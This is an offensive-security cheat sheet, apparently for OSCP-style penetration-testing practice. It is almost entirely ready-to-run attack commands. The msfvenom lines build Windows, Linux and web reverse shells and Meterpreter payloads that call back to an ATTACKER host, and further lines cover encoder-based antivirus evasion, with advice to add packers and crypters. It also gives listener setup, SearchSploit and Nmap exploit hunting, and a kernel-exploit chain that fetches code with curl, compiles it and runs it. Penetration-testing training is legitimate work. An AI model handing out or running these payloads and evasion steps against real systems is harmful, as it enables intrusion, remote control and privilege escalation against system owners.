MSFVenom Basics

# Syntax
msfvenom -p <PAYLOAD> LHOST=<ATTACKER_IP> LPORT=<PORT> -f <FORMAT> -o <FILENAME>

Windows Payloads

1. Reverse Shell (EXE)

msfvenom -p windows/shell_reverse_tcp LHOST=ATTACKER LPORT=4444 -f exe -o shell.exe

# syntax
msfvenom -p windows/x64/shell/reverse_tcp -f exe -o shell.exe LHOST=<listen-IP> LPORT=<listen-port>

# example
msfvenom -p windows/x64/shell/reverse_tcp -f exe -o shell.exe LHOST=<listen-IP> LPORT=<listen-port>

2. Meterpreter Reverse Shell (EXE)

msfvenom -p windows/meterpreter/reverse_tcp LHOST=ATTACKER LPORT=4444 -f exe -o meterpreter.exe

3. PowerShell One-Liner (no file drop)

msfvenom -p windows/shell_reverse_tcp LHOST=ATTACKER LPORT=4444 -f psh-cmd

Linux Payloads

1. Reverse Shell (ELF)

msfvenom -p linux/x86/shell_reverse_tcp LHOST=ATTACKER LPORT=4444 -f elf -o shell.elf

2. Meterpreter Reverse (Linux ELF)

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=ATTACKER LPORT=4444 -f elf -o meterpreter.elf

3. Script Payloads (Bash / Python)

msfvenom -p cmd/unix/reverse_bash LHOST=ATTACKER LPORT=4444 -f raw

Web Payloads

1. PHP Reverse Shell

msfvenom -p php/reverse_php LHOST=ATTACKER LPORT=4444 -f raw > shell.php

2. ASP Reverse Shell (Windows)

msfvenom -p windows/shell_reverse_tcp LHOST=ATTACKER LPORT=4444 -f asp > shell.asp

3. WAR Payload (Java/Tomcat)

msfvenom -p java/jsp_shell_reverse_tcp LHOST=ATTACKER LPORT=4444 -f war > shell.war

Other Formats

-f exe       # Windows EXE
-f elf       # Linux ELF binary
-f asp/aspx  # ASP payloads
-f war       # Java web archives
-f ps1       # PowerShell
-f psh-cmd   # PowerShell one-liner
-f raw       # Raw shell (bash, python, etc.)
-f js        # JavaScript

Evade AV with Encoders (optional)

# Use encoder to obfuscate payload
msfvenom -p windows/shell_reverse_tcp LHOST=ATTACKER LPORT=4444 -e x86/shikata_ga_nai -i 3 -f exe -o evashell.exe

• -e → encoder module

• -i → number of iterations

Don’t rely solely on encoding for AV evasion — combine with packers, crypters, or LOLBIN delivery.

Listener Setup

# msfconsole listener (multi/handler)
use exploit/multi/handler
set PAYLOAD windows/shell_reverse_tcp
set LHOST ATTACKER
set LPORT 4444
run

# or simple netcat listener
nc -lvnp 4444

Here’s a lean, fast-action cheat sheet just for SearchSploit and Nmap NSE Scripts—crafted for OSCP-style recon and exploit hunts.

SearchSploit (Offline Exploit Search)

Update ExploitDB

sudo apt update && sudo apt install exploitdb

Basic Search

searchsploit apache struts
searchsploit linux kernel 2.6.22

Title-only search

searchsploit -t wordpress

Copy Exploit Locally

searchsploit -m 48537              # by EDB-ID
searchsploit -m windows/remote/42031.py

Show Full Path

searchsploit -p 48537

Get Online Link Instead

searchsploit --www 48537

Exclude False Positives

searchsploit smb windows --exclude="(dos|PoC)"

JSON Output (for parsing)

searchsploit -j eternalblue | json_pp

Searchsploit Directory

/usr/share/exploitdb/

Nmap NSE (Scripted Scanning + Exploits)

Script Directory

/usr/share/nmap/scripts/

Find Exploits in NSE

grep Exploits /usr/share/nmap/scripts/*.nse

List All Scripts (Optional)

ls /usr/share/nmap/scripts/

Run Script Against Target

nmap -p80 --script=http-fileupload-exploiter $IP

Search by Category

nmap --script "vuln" $IP

Help for a Script

nmap --script-help=http-fileupload-exploiter.nse

Kernel Exploit

# find the kernel
uname -a

# search for CVE
searchsploit 3.13.0  

# pull it in searchsplot
searchsploit -m 37292

# host the file
python3 -m http.server

-

# pull onto box
curl http://10.10.10.10:8080/37292.c

# compile
gcc 37292.c -o exploit

# run
./exploit